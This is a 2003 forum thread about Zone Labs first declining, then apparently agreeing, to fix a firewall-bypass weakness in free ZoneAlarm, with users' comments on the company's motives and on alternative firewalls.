kairon Posted July 4, 2003 Share Posted July 4, 2003 Zone Labs said it will not fix a vulnerability found in the freeware version of its ZoneAlarm firewall. The company said the vulnerability was a problem found in Windows, not its firewall, and that it would require the hacker equivalent of "brain surgery" to exploit. Instead, Zone Labs executives said that the vulnerability could be protected against by using one of its paid products: ZoneAlarm Plus, ZoneAlarm Pro, or its Integrity enterprise system. According to the posting to the BugTraq mailing list, the vulnerability involves the Windows shell32.dll file, which can invoke the ShellExecute function. When one of the parameters of ShellExecute is set to a Web address, the web browser is prompted to access the web site in question -- and, under most ZoneAlarm configurations, is allowed to freely access web sites without the express permission of the user. According to the poster, "aceh", that browser could quickly access a malicious web site, funnel a short string of confidential information (such as a username and password) and quickly redirect itself to an innocuous and trusted web site. Although not stated expressly, the vulnerability appears to first require a Trojan to be loaded onto the user's machine via an email virus or some other means. However, "aceh" concluded that the vulnerability is common to all of the freeware versions of ZoneAlarm. Executives at Zone Labs, however, said that the free version of ZoneAlarm provides adequate protection. Read more @ ExtremeTech Link to comment Share on other sites More sharing options...
bangbang023 Veteran Posted July 4, 2003 Veteran Share Posted July 4, 2003 kinda sucks for those freeware users. Link to comment Share on other sites More sharing options...
enigma-penguin Veteran Posted July 4, 2003 Veteran Share Posted July 4, 2003 if its a problem with windows its not their problem.... and even if it was its the freeware version(they are a company you know, they want /need to make money) and it'll just be a nudge to say ..come on buy a copy besides ms isnt gonna fix it either... they wont even fix that 100% cpu usage bug Link to comment Share on other sites More sharing options...
empty Posted July 4, 2003 Share Posted July 4, 2003 Pah, good firewall, crappy company. Link to comment Share on other sites More sharing options...
RazorSA Posted July 4, 2003 Share Posted July 4, 2003 get the full version, pay the $$$ Link to comment Share on other sites More sharing options...
kagaku Posted July 4, 2003 Share Posted July 4, 2003 Or get yourself a real router/firewall. www.smoothwall.org / www.clarkconnect.org / www.freebsd.org All good choices. :p Link to comment Share on other sites More sharing options...
MxxCon Posted July 4, 2003 Share Posted July 4, 2003 they WILL FIX free version after all so this article isn't really relavant now but still nice to know that ZoneLabs is thinking of money before security Link to comment Share on other sites More sharing options...
EnisDonKing_ Posted July 4, 2003 Share Posted July 4, 2003 kinda lame try to *scare* some users which will switch on pro version imm. Link to comment Share on other sites More sharing options...
bangbang023 Veteran Posted July 5, 2003 Veteran Share Posted July 5, 2003 but still nice to know that ZoneLabs is thinking of money before security yeah no kidding, imagine if MS did something like this? People wouldn't stop b*tching. Link to comment Share on other sites More sharing options...
SiXXGuNNZ Posted July 5, 2003 Share Posted July 5, 2003 couldnt ya just manually add shell32.dll to the programs list and block everything from it? Link to comment Share on other sites More sharing options...
aem4162 Posted July 5, 2003 Share Posted July 5, 2003 they WILL FIX free version after all so this article isn't really relavant nowbut still nice to know that ZoneLabs is thinking of money before security this was on screensavers last night or the night before...ss was going to report that za wasn't going to fix the hole and then za heard about it and said they'd fix it...something like that Link to comment Share on other sites More sharing options...
MxxCon Posted July 5, 2003 Share Posted July 5, 2003 they WILL FIX free version after all so this article isn't really relavant nowbut still nice to know that ZoneLabs is thinking of money before security this was on screensavers last night or the night before...ss was going to report that za wasn't going to fix the hole and then za heard about it and said they'd fix it...something like that http://www.dslreports.com/shownews/30039 :whistle: Link to comment Share on other sites More sharing options...
bangbang023 Veteran Posted July 5, 2003 Veteran Share Posted July 5, 2003 it's amazing what fear of bad publicity will do to a company. Link to comment Share on other sites More sharing options...
Mr. Black Posted July 6, 2003 Share Posted July 6, 2003 This decision was reversed the other day. Link to comment Share on other sites More sharing options...
Sierra Posted July 6, 2003 Share Posted July 6, 2003 ZA rules ! ;) Link to comment Share on other sites More sharing options...
housegroover Posted July 7, 2003 Share Posted July 7, 2003 Or get yourself a real router/firewall. www.smoothwall.org / www.clarkconnect.org / www.freebsd.orgAll good choices. :p What sort of firewall would do for a PC? home use. PM if you can. Link to comment Share on other sites More sharing options...
Recommended Posts